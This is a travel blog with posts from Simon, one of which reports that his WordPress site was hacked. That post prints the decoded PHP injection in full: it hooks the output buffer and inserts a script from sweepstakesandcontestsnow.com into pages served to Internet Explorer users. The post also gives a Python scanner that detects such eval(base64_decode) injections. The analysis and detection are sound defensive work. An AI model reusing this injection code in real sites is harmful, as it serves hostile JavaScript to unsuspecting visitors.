Falling behind

So, the blog’s fallen behind a little!

I’ve just added some new posts about the end of our time in Brazil, and a few more will follow shortly. Since we’re posting them with the date we were at the place rather than the date
they were uploaded, they’re appearing below the more recent stuff – so scroll on down to see them!

Thanks,
Simon

How embarrassing!

Well, it appears that some nasty spammer managed to add some JavaScript to the footer of this Blog, and so if you’ve accessed it recently using Internet Explorer you should make sure your anti-virus is up to date.

I’m still looking into what happened, and since we’re about to go offline for a week, I’ve temporarily hobbled the blog slightly to prevent the spam from showing. This means that some pages might not work quite as expected (e.g. the where-are-we map). We’re still here and normal service will be resumed in a bit.

We’re very sorry for the inconvenience; we have no desire to have any advertising or whatnot pop up while you’re gracing us with your time!

Many thanks to Laura’s Dad for pointing this out; hopefully it won’t happen again.

Update, September 22nd

So it turns out my hobbling above still didn’t fix the problem. I’ve finally cleared things out and all should now be fine. If anyone’s interested, it looks like we were hit by a variant of this: http://sucuri.net/malware/malware-entry-mwmrobh2

I’m still unclear on the infection route, but think it probably happened due to brute force guessing of our admin password, which has now been changed, along with everything else.

The problem code inserted a base64-encoded string to be evaluated in each PHP file, which evaluates as the following (comments added by me).

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
  $GLOBALS['mr_no']=1;
  if(!function_exists('mrobh')){
    if(!function_exists('gml')){
      // Only serves the payload to Internet Explorer 6-9 user agents.
      function gml(){
        if (stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 6")
           ||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 7")
           ||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")
           ||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 9")){
          return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9zd2VlcHN0YWtlc2FuZGNvbnRlc3Rzbm93LmNvbS9ubC5waHA/bm5uPTEiPjwvc2NyaXB0Pg==");
        }
        return "";
      }
      // That decodes to <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1"></script>,
      // which is the suspect JavaScript.
    }

    // This then sets the output buffer to rewrite each page and drop the above script just before
    // the </body> tag. Cunning, especially with the gzdecode stuff.
    if(!function_exists('gzdecode')){
      // Hand-rolled gzip decoder for PHP builds without gzdecode(): reads the
      // FLG byte at offset 3, skips the optional header fields it announces
      // (FEXTRA=4, FNAME=8, FCOMMENT=16, FHCRC=2) and inflates the rest.
      function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
        $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
        $RBE4C4D037E939226F65812885A53DAD9=10;
        $RA3D52E52A48936CDE0F5356BB08652F2=0;
        if($R30B2AB8DC1496D06B230A71D8962AF5D&4){
          $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
          $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
          $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&8){
          $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&16){
          $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&2){
          $RBE4C4D037E939226F65812885A53DAD9+=2;
        }
        $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
        if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
          // Not gzip after all: pass the buffer through untouched.
          $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
        }
        return $R034AE2AB94F99CC81B389A1822DA3353;
      }
    }
    // Output-buffer callback: decompresses the page if needed and inserts the
    // script tag before </body> (or appends it when there is no </body>).
    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
      Header('Content-Encoding: none');
      $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
      if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
        return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
      }else{
        return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
      }
    }
    ob_start('mrobh');
  }
}

(Ah, that brings back some memories of Slang from GS… Dynamic function definitions, oh yes)
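Since the infection lived as an eval(base64_decode("...")) line appended to every PHP file, the quickest way to find every copy (and to confirm the clean-up worked) is to decode those literals rather than grep for the script URL alone. The scanner below is an added example, not code from the blog or from the Sucuri write-up: it pulls each eval(base64_decode(...)) literal out of a PHP source, decodes it, decodes any base64 literal nested inside the payload (the <script> tag here was hidden that way), and reports which indicators from the code above appear. The indicator list (SUSPICIOUS_MARKERS) and the sample infected file are my own constructions; only the script-tag base64 string is taken from the page.

```python
import base64
import binascii
import os
import re

# Strings that appear in the decoded injection shown above. Treating them
# as indicators is my assumption for this example, not a published signature.
SUSPICIOUS_MARKERS = (
    "ob_start(",
    "gzdecode",
    "HTTP_USER_AGENT",
    "<script src=",
    "$GLOBALS['mr_no']",
)

# eval(base64_decode("...")) as it is typically appended to PHP files.
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)
# Any further base64 literal inside a decoded payload (the <script> tag here).
B64_LITERAL_RE = re.compile(
    r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.IGNORECASE
)


def decode_b64_literal(blob):
    """Decode a base64 literal to text, or return None if it is not valid base64."""
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", blob), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", "replace")


def find_markers(text):
    """Return the SUSPICIOUS_MARKERS present in `text`, in list order."""
    return [m for m in SUSPICIOUS_MARKERS if m in text]


def scan_php_source(source):
    """Return one finding per eval(base64_decode(...)) in a PHP source string."""
    findings = []
    for match in EVAL_B64_RE.finditer(source):
        payload = decode_b64_literal(match.group(1))
        if payload is None:
            continue
        # Payloads often hide further literals; decode them so the reviewer
        # sees what the page would actually emit to the browser.
        nested = [decode_b64_literal(m.group(1)) for m in B64_LITERAL_RE.finditer(payload)]
        nested = [n for n in nested if n is not None]
        findings.append({
            "offset": match.start(),
            "decoded": payload,
            "nested": nested,
            "markers": find_markers(payload + "\n" + "\n".join(nested)),
        })
    return findings


def scan_directory(root):
    """Map each .php file under `root` that has findings to its findings."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                found = scan_php_source(fh.read())
            if found:
                hits[path] = found
    return hits


# Constructed sample: a miniature of the injection above (user-agent check,
# nested script literal, ob_start) wrapped in eval(base64_decode()) the way the
# infected files carried it. SCRIPT_B64 is the literal from the decoded code.
SCRIPT_B64 = "PHNjcmlwdCBzcmM9Imh0dHA6Ly9zd2VlcHN0YWtlc2FuZGNvbnRlc3Rzbm93LmNvbS9ubC5waHA/bm5uPTEiPjwvc2NyaXB0Pg=="
INNER_PHP = (
    "if(!isset($GLOBALS['mr_no'])){$GLOBALS['mr_no']=1;"
    'if(stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")){'
    'echo base64_decode("' + SCRIPT_B64 + '");}'
    "ob_start('mrobh');}"
)
SAMPLE_PHP = (
    "<?php\n"
    "// constructed: an ordinary theme footer\n"
    "get_footer();\n"
    'eval(base64_decode("' + base64.b64encode(INNER_PHP.encode()).decode() + '"));\n'
)

if __name__ == "__main__":
    for finding in scan_php_source(SAMPLE_PHP):
        print("eval(base64_decode()) at byte", finding["offset"])
        print("  markers:", ", ".join(finding["markers"]))
        for tag in finding["nested"]:
            print("  nested literal:", tag)
```

Run it over a webroot with scan_directory("/path/to/wordpress") to list every infected file; a clean tree returns an empty dict. The regex deliberately tolerates whitespace and either quote style, because re-infections of this kind are frequently re-wrapped rather than byte-identical, while the marker list is what tells an injected blob apart from the occasional legitimate base64 literal in a plugin.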

Anyway, all should be good now. Hopefully we don’t get hacked again tonight!

Simon

The daily blog

We’ve just got internet for the first time in a week and so there’s a whole bunch of new posts below.

In case you think I’ve become addicted to writing blog posts, maybe I have, but I’m quite enjoying it! This is essentially my travel diary since I don’t have the artistic skills Laura has to produce a beautiful scrapbook. I’m not expecting anyone to read any or all of it – although of course you’re welcome!

We’re marking posts with the day they’re written rather than when they’re posted online, so you might find posts suddenly appearing for days in the past.

One other thing – at the moment all the photos on this blog are from an iPhone. We’re hoping to spend some time going through the ones from our cameras, and the good ones will be up on flickr soon – possibly in the next few days depending on how much time we have in Kathmandu.

Simon